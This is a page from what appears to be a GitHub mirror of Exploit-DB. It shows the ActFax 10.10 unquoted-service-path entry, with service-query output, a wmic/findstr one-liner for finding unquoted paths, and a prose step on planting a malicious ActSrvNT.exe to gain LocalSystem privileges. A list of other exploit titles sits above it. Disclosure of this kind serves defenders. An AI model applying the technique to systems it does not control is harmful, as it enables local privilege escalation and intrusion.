bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/windows/local/51332.txt
Exploit-DB 85954a8fad DB: 2023-04-09 
34 changes to exploits/shellcodes/ghdb

ENTAB ERP 1.0 - Username PII leak

ReQlogic v11.3 - Reflected Cross-Site Scripting (XSS)

ZCBS/ZBBS/ZPBS v4.14k - Reflected Cross-Site Scripting (XSS)

FortiRecorder 6.4.3 - Denial of Service

Schneider Electric v1.0 - Directory traversal & Broken Authentication

Altenergy Power Control Software C1.2.5 - OS command injection

Goanywhere Encryption helper 7.1.1 - Remote Code Execution (RCE)

Pentaho BA Server EE 9.3.0.0-428 - Remote Code Execution (RCE) (Unauthenticated)

Google Chrome  109.0.5414.74 - Code Execution via missing lib file (Ubuntu)

Lucee Scheduled Job v1.0 -  Command Execution

Microsoft Excel 365 MSO (Version 2302 Build 16.0.16130.20186) 64-bit - Remote Code Execution (RCE)

Adobe Connect 11.4.5 - Local File Disclosure

Palo Alto Cortex XSOAR 6.5.0 - Stored Cross-Site Scripting (XSS)

Suprema BioStar 2 v2.8.16 - SQL Injection

Symantec Messaging Gateway 10.7.4 - Stored Cross-Site Scripting (XSS)

dotclear 2.25.3 - Remote Code Execution (RCE) (Authenticated)

GLPI v10.0.1 - Unauthenticated Sensitive Data Exposure

Icinga Web 2.10 - Arbitrary File Disclosure

Joomla! v4.2.8 - Unauthenticated information disclosure

Medicine Tracker System v1.0 - Sql Injection

Online Appointment System V1.0 - Cross-Site Scripting (XSS)

Online-Pizza-Ordering -1.0 - Remote Code Execution (RCE)

pfsenseCE v2.6.0 - Anti-brute force protection bypass

Restaurant Management System 1.0  - SQL Injection

WebsiteBaker v2.13.3 - Cross-Site Scripting (XSS)
X2CRM v6.6/6.9 - Reflected Cross-Site Scripting (XSS) (Authenticated)
X2CRM v6.6/6.9 - Stored Cross-Site Scripting (XSS) (Authenticated)

Microsoft Windows 11 - 'cmd.exe' Denial of Service

ActFax 10.10 - Unquoted Path Services

ESET Service 16.0.26.0 - 'Service ekrn' Unquoted Service Path

RSA NetWitness Platform 12.2 - Incorrect Access Control / Code Execution

Stonesoft VPN Client 6.2.0 / 6.8.0 - Local Privilege Escalation
2023-04-09 00:16:30 +00:00

44 lines
No EOL
1.3 KiB
Text
Raw Blame History

# Exploit Title: ActFax 10.10 - Unquoted Path Services
# Date: 22/03/2023
# Exploit Author: Birkan ALHAN (@taftss)
# Vendor Homepage: https://www.actfax.com
# Software Link: https://www.actfax.com/en/download.html
# Version: Version 10.10, Build 0551 (2023-02-01)
# Tested on: Windows 10 21H2 OS Build 19044.2728
#Discover to Unquoted Services Path:
C:\Users\taftss>sc qc ActiveFaxServiceNT
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: ActiveFaxServiceNT
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files\ActiveFax\Server\ActSrvNT.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : ActiveFax-Server-Service
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
C:\Users\taftss>systeminfo
Host Name: RedsTaftss
OS Name: Microsoft Windows 10 Pro
OS Version: 10.0.19044 N/A Build 19044
#Another Discover Methot to Unquoted Services Path:
wmic service get name,displayname,pathname,startmode | findstr /i
"auto" | findstr /i /v "c:\windows\\" | findstr /i /v """
#Exploit:
If the attacker has taken over the system and the taken user has write
privileges to the "C:\Program Files\ActiveFax" folder or "C:\", they
can inject their own malicious "ActSrvNT.exe" file. Then the
ActiveFaxServiceNT Service can be restarted to privilege escalation.
--
*Birkan ALHAN*
Reference in a new issue View git blame Copy permalink